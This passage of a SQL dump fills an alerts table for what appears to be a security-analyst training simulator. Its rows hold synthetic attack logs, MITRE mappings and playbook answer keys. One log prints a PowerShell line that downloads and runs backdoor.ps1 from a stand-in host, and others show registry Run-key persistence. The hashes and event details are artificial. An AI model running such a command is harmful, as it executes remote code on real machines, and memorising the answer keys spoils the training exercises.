Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1333, 'Lateral Movement Pathway Identified', 'high', 'Network Traffic Analysis', 'The threat actor is leveraging harvested credentials to move laterally within the network, targeting additional systems to gain broader access and locate sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"file_accessed\":\"\\\\\\\\192.168.1.25\\\\sensitive_data\\\\financial_report.xlsx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_type\":\"Successful Login\",\"protocol\":\"SMB\",\"malware_filename\":\"mimikatz.exe\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used by credential-stealing malware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee username with compromised credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1334, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP)', 'Agrius APT group attempts to exfiltrate sensitive corporate data using encrypted channels, exploiting weaknesses in network monitoring to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Encrypted Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:31Z\",\"event_id\":\"DLP-EXFIL-20231012-0005\",\"source_ip\":\"192.168.15.8\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"file_name\":\"company_secrets.zip\",\"file_hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"file_size\":\"10MB\",\"encryption\":\"AES-256\",\"action\":\"allowed\",\"alert_level\":\"high\",\"description\":\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Agrius APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus database\",\"verdict\":\"suspicious\",\"details\":\"File hash detected in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"company_secrets.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file potentially exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.827Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:31Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231012-0005\\\",\\\"source_ip\\\":\\\"192.168.15.8\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"company_secrets.zip\\\",\\\"file_hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"file_size\\\":\\\"10MB\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_level\\\":\\\"high\\\",\\\"description\\\":\\\"An encrypted data transfer was detected from an internal host to an external IP associated with Agrius APT activities.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1335, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected aimed at gaining an initial foothold into the telecommunications network. The email contains a malicious attachment believed to be associated with the MuddyWater APT group.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"email_id\":\"1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.5\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"victim@telecomnetwork.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":{\"filename\":\"invoice_details.docm\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"detected_malware\":\"MuddyWater\",\"action_taken\":\"Email quarantined\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known MuddyWater malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.828Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1336, 'Execution of Malicious PowerShell Script', 'high', 'Endpoint Detection and Response (EDR) Systems', 'A PowerShell script was executed on the host system to download and run a backdoor, associated with the MuddyWater APT group. This script execution is part of a post-compromise activity aimed at maintaining persistence and enabling further malicious actions within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:56:23Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-8D7KJH5\",\"user\":\"jdoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\",\"script_content\":\"IEX (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/backdoor.ps1\')\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"script.ps1\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with MuddyWater APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malware distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in PowerShell attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account used to execute the script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1337, 'Establishment of Persistent Backdoor', 'high', 'System Logs', 'MuddyWater has leveraged its custom C2 framework to install a persistent backdoor, ensuring long-term access. The backdoor was deployed using a malicious script that altered system configurations for persistence.', 'Persistence', 'TA0003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:44Z\",\"event_type\":\"system_modification\",\"system_user\":\"svc_backup\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\backdoor.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_change\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\backdoor\",\"action\":\"create_persistence\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 IP associated with MuddyWater operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with MuddyWater backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as a persistent backdoor.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc_backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Account Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Service account used in unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:44Z\\\",\\\"event_type\\\":\\\"system_modification\\\",\\\"system_user\\\":\\\"svc_backup\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\backdoor\\\",\\\"action\\\":\\\"create_persistence\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1338, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'With persistence established, MuddyWater begins lateral movement, exploiting vulnerabilities to reach critical network segments. The attacker used stolen credentials to attempt access to sensitive telecommunications infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event\":\"lateral_movement\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"filename\":\"\\\\\\\\192.168.1.45\\\\sensitive_data\\\\telecom_infra.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"attempt_access\",\"outcome\":\"success\",\"related_alerts\":[\"APT_MW-001\",\"APT_MW-002\"]}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with MuddyWater APT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network segment.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials suspected to be compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by MuddyWater APT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 